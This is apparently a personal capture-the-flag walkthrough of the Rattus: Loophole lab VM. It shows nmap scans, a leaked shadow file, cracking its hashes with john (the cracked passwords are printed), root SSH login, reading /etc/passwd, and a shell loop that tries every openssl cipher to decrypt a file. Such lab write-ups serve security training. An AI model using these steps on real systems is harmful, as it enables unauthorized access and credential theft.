Rattus: Loophole – Walkthrough

Even if i have a lot to do, i try to learn more thing in security hole. This challenge include openssl encryption in the description of the VM. I have been experience about open ssl decrpytion at the De-ICE 100. So what different openssl on this box? let’s try to find the encryption message.

Target ip  is 10.8.7.2.

─[[email protected]]─[~]
└──> nmap 10.8.7.* -sn -n

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 13:15 +0630
Nmap scan report for 10.8.7.1
Host is up (0.00041s latency).
MAC Address: 00:50:56:C0:00:02 (VMware)
Nmap scan report for 10.8.7.2
Host is up (0.00030s latency).
MAC Address: 00:0C:29:07:50:58 (VMware)
Nmap scan report for 10.8.7.30
Host is up (0.00014s latency).
MAC Address: 00:50:56:E0:77:E0 (VMware)
Nmap scan report for 10.8.7.3
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.96 seconds

Do you know how nmap is important for you?. For me, Scan again with nmap

┌─[[email protected]]─[~]
└──> nmap -sV 10.8.7.2

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 13:17 +0630
Nmap scan report for 10.8.7.2
Host is up (0.0021s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.4 (protocol 1.99)
80/tcp  open  http        Apache httpd 1.3.31 ((Unix) PHP/4.4.4)
113/tcp open  ident?
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:07:50:58 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.96 seconds

Try to explore port 80 and scan dir with dirbuster.

I check all links and found shadow file at grabage url.

http://10.8.7.2/garbage

root:$1$x2YBL0KB$E7QI7AF9ZeiqcfMRQ4KZ11:15018:0:::::
smmsp:!!:9797:0:::::
mysql:!!:9797:0:::::
rpc:!!:9797:0:::::
sshd:!!:9797:0:::::
apache:!!:9797:0:::::
nobody:!!:9797:0:::::
mhog:$1$ZQAbXwf3$TgcNjljKW.2tlJw4OICDr1:15019:0:::::0
tskies:$1$ZvNtdn0x$ck5hnAwXg.OLQPOtg28Hb.:15019:0:::::0

Great! Nice Cache. Try to crack shadow file with john cracker.

┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> ls -al
total 20
drwxr-xr-x 2 root root 4096 Jan  8 12:42 .
drwxr-xr-x 8 root root 4096 Jan  2 12:29 ..
-rwxrwxrwx 1 root root  367 Dec 25 18:37 formatshadow.py
-rw-rw-rw- 1 root root  164 Jan  8 12:41 raw.txt
-rw-r--r-- 1 root root  223 Jan  8 12:42 shadow
┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> cat raw.txt 
root:$1$x2YBL0KB$E7QI7AF9ZeiqcfMRQ4KZ11:15018:0:::::0
mhog:$1$ZQAbXwf3$TgcNjljKW.2tlJw4OICDr1:15019:0:::::0
tskies:$1$ZvNtdn0x$ck5hnAwXg.OLQPOtg28Hb.:15019:0:::::0
┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> john --show shadow 
root:albatros:500:500:,,,:/home/root:/bin/bash
tskies:nostradamus:502:500:,,,:/home/tskies:/bin/bash

2 password hashes cracked, 1 left

After cracking some minutes later, I got root password so login again ssh.

┌─[✗]─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> ssh [email protected]




           ===========================================================
                             WELCOME TO RATTUS LABS
           ===========================================================

                You've been connected to loophole.rattus.lab 

              To access the system you must use valid credentials.

           ===========================================================




[email protected]'s password: 
Last login: Mon Jan  8 12:43:31 2018 from 10.8.7.3






   ===========================================================
                     WELCOME TO RATTUS LABS
   ===========================================================

      I'm here to serve you MASTER ... 

   ===========================================================


[[email protected]]$  cat /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
mhog:x:500:100:Mark Hog,+38599112911,,Ilica 13:/home/mhog:/bin/bash
tskies:x:501:100:Tom Skies,+38599911112,,Ilica 17:/home/tskies:/bin/bash
jsummer:x:502:0:Jay Summer,+38598112911,,Ilica 7:/home/jsummer:/bin/bash

Login success and found Private.doc.en file. Yes this file need to decrypt with password. I try to use my 2 password in there . I notice this encrypt file is under tskies folders. Therefore, i use the pasword of tskies and try to write bat file to know the algorithm.

ciphers=`openssl list-cipher-commands`
for i in $ciphers; do
        openssl enc -d -${i} -in Private.doc.enc -k nostradamus > /dev/null 2>&1
        if [[ $? -eq 0 ]]; then
                echo "Cipher is $i: openssl enc -d -${i} -in Private.doc.enc -k nostradamus -out priv.doc"
        exit
        fi
done

After that, I got the decrypt file.

[[email protected]]$  ./crack.sh 
Cipher is aes-256-cbc: openssl enc -d -aes-256-cbc -in Private.doc.enc -k nostradamus -out priv.doc
[[email protected]]$  openssl enc -d -aes-256-cbc -in Private.doc.enc -k nostradamus -out priv.doc
error writing output file
[[email protected]]$  ls 
Desktop/  Private.doc.enc  crack.sh*  priv.doc  temp/

I upload the file to the online and view the file with online doc viewer.

This PDF download here. priv

Thanks for reading. Happy Hacking.